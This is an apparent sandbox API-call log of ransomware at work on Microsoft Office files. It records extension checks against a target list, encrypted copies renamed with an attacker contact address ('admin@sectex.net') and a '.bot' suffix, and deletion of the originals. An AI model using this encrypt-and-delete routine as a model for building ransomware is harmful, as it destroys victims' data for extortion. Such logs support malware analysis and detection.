	[0144.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.397] lstrlenW (lpString=".doc") returned 4
	[0144.397] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString=".docx") returned 5
	[0144.397] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0144.397] lstrlenW (lpString=".pdf") returned 4
	[0144.397] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString=".xls") returned 4
	[0144.397] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString=".xlsx") returned 5
	[0144.397] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0144.397] lstrlenW (lpString=".ppt") returned 4
	[0144.397] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.397] lstrlenW (lpString=".zip") returned 4
	[0144.397] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString=".rar") returned 4
	[0144.397] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.397] lstrlenW (lpString=".bz2") returned 4
	[0144.397] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.397] lstrlenW (lpString=".7z") returned 3
	[0144.397] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.397] lstrlenW (lpString=".dbf") returned 4
	[0144.397] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.397] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString=".1cd") returned 4
	[0144.398] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString=".jpg") returned 4
	[0144.398] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString=".doc") returned 4
	[0144.398] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString=".docx") returned 5
	[0144.398] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0144.398] lstrlenW (lpString=".pdf") returned 4
	[0144.398] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString=".xls") returned 4
	[0144.398] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString=".xlsx") returned 5
	[0144.398] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0144.398] lstrlenW (lpString=".ppt") returned 4
	[0144.398] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString=".zip") returned 4
	[0144.398] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString=".rar") returned 4
	[0144.398] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0144.398] lstrlenW (lpString=".bz2") returned 4
	[0144.398] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0144.398] lstrlenW (lpString=".7z") returned 3
	[0144.398] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.398] lstrlenW (lpString=".dbf") returned 4
	[0144.398] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0144.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.399] lstrlenW (lpString=".1cd") returned 4
	[0144.399] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0144.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL") returned 60
	[0144.399] lstrlenW (lpString=".jpg") returned 4
	[0144.399] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0144.399] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".bot") returned 1
	[0144.399] lstrlenW (lpString="ENVELOPR.DLL.IDX_DLL") returned 20
	[0144.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.399] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=13696) returned 1
	[0144.399] CloseHandle (hObject=0x384) returned 1
	[0144.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll")) returned 0x20
	[0144.400] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.400] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.400] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.401] GetLastError () returned 0x0
	[0144.401] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x3580, lpOverlapped=0x0) returned 1
	[0144.403] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x3590, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x3590, lpOverlapped=0x0) returned 1
	[0144.404] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.404] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfc, lpOverlapped=0x0) returned 1
	[0144.404] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.404] CloseHandle (hObject=0x3cc) returned 1
	[0144.404] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.404] SetEndOfFile (hFile=0x384) returned 1
	[0144.408] CloseHandle (hObject=0x384) returned 1
	[0144.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.409] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll.idx_dll")) returned 1
	[0144.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.409] lstrlenW (lpString=".doc") returned 4
	[0144.409] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0144.409] lstrlenW (lpString=".docx") returned 5
	[0144.409] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0144.409] lstrlenW (lpString=".pdf") returned 4
	[0144.409] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0144.409] lstrlenW (lpString=".xls") returned 4
	[0144.410] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".xlsx") returned 5
	[0144.410] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0144.410] lstrlenW (lpString=".ppt") returned 4
	[0144.410] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString=".zip") returned 4
	[0144.410] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".rar") returned 4
	[0144.410] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".bz2") returned 4
	[0144.410] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".7z") returned 3
	[0144.410] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString=".dbf") returned 4
	[0144.410] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString=".1cd") returned 4
	[0144.410] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString=".jpg") returned 4
	[0144.410] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.410] lstrlenW (lpString=".doc") returned 4
	[0144.410] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".docx") returned 5
	[0144.410] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0144.410] lstrlenW (lpString=".pdf") returned 4
	[0144.410] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0144.410] lstrlenW (lpString=".xls") returned 4
	[0144.411] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString=".xlsx") returned 5
	[0144.411] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0144.411] lstrlenW (lpString=".ppt") returned 4
	[0144.411] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.411] lstrlenW (lpString=".zip") returned 4
	[0144.411] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString=".rar") returned 4
	[0144.411] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString=".bz2") returned 4
	[0144.411] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString=".7z") returned 3
	[0144.411] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0144.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.411] lstrlenW (lpString=".dbf") returned 4
	[0144.411] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.411] lstrlenW (lpString=".1cd") returned 4
	[0144.411] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0144.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL.IDX_DLL") returned 68
	[0144.411] lstrlenW (lpString=".jpg") returned 4
	[0144.411] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0144.411] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0144.411] lstrlenW (lpString="EQPLIST.VRD") returned 11
	[0144.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.412] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1699) returned 1
	[0144.413] CloseHandle (hObject=0x384) returned 1
	[0144.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 0x20
	[0144.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.413] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.413] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.416] GetLastError () returned 0x0
	[0144.417] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6a3, lpOverlapped=0x0) returned 1
	[0144.418] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6b0, lpOverlapped=0x0) returned 1
	[0144.419] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.419] WriteFile (in: hFile=0x3cc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0144.419] SetEndOfFile (hFile=0x3cc) returned 1
	[0144.419] CloseHandle (hObject=0x3cc) returned 1
	[0144.420] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.420] SetEndOfFile (hFile=0x384) returned 1
	[0144.421] CloseHandle (hObject=0x384) returned 1
	[0144.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.422] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\eqplist.vrd")) returned 1
	[0144.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.422] lstrlenW (lpString=".doc") returned 4
	[0144.422] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.422] lstrlenW (lpString=".docx") returned 5
	[0144.422] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0144.422] lstrlenW (lpString=".pdf") returned 4
	[0144.422] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString=".xls") returned 4
	[0144.423] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.423] lstrlenW (lpString=".xlsx") returned 5
	[0144.423] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0144.423] lstrlenW (lpString=".ppt") returned 4
	[0144.423] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString=".zip") returned 4
	[0144.423] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0144.423] lstrlenW (lpString=".rar") returned 4
	[0144.423] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString=".bz2") returned 4
	[0144.423] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString=".7z") returned 3
	[0144.423] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString=".dbf") returned 4
	[0144.423] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString=".1cd") returned 4
	[0144.423] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString=".jpg") returned 4
	[0144.423] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.423] lstrlenW (lpString=".doc") returned 4
	[0144.423] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString=".docx") returned 5
	[0144.423] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1
	[0144.423] lstrlenW (lpString=".pdf") returned 4
	[0144.423] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.423] lstrlenW (lpString=".xls") returned 4
	[0144.424] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.424] lstrlenW (lpString=".xlsx") returned 5
	[0144.424] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1
	[0144.424] lstrlenW (lpString=".ppt") returned 4
	[0144.424] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.424] lstrlenW (lpString=".zip") returned 4
	[0144.424] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0144.424] lstrlenW (lpString=".rar") returned 4
	[0144.424] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0144.424] lstrlenW (lpString=".bz2") returned 4
	[0144.424] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0144.424] lstrlenW (lpString=".7z") returned 3
	[0144.424] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0144.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.424] lstrlenW (lpString=".dbf") returned 4
	[0144.424] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0144.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.424] lstrlenW (lpString=".1cd") returned 4
	[0144.424] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0144.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EQPLIST.VRD") returned 59
	[0144.424] lstrlenW (lpString=".jpg") returned 4
	[0144.424] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0144.424] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0144.424] lstrlenW (lpString="EXCEL.DEV.HXS") returned 13
	[0144.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.426] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=7024126) returned 1
	[0144.426] CloseHandle (hObject=0x384) returned 1
	[0144.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs")) returned 0x20
	[0144.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.426] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\excel.dev.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0144.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.426] lstrlenW (lpString=".doc") returned 4
	[0144.426] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0144.426] lstrlenW (lpString=".docx") returned 5
	[0144.426] lstrcmpiW (lpString1=".docx", lpString2="V.HXS") returned -1
	[0144.426] lstrlenW (lpString=".pdf") returned 4
	[0144.426] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0144.426] lstrlenW (lpString=".xls") returned 4
	[0144.426] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0144.426] lstrlenW (lpString=".xlsx") returned 5
	[0144.426] lstrcmpiW (lpString1=".xlsx", lpString2="V.HXS") returned -1
	[0144.426] lstrlenW (lpString=".ppt") returned 4
	[0144.426] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0144.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.426] lstrlenW (lpString=".zip") returned 4
	[0144.427] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString=".rar") returned 4
	[0144.427] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString=".bz2") returned 4
	[0144.427] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0144.427] lstrlenW (lpString=".7z") returned 3
	[0144.427] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.427] lstrlenW (lpString=".dbf") returned 4
	[0144.427] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.427] lstrlenW (lpString=".1cd") returned 4
	[0144.427] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
	[0144.427] lstrlenW (lpString=".jpg") returned 4
	[0144.427] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0144.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL.DEV.HXS") returned 61
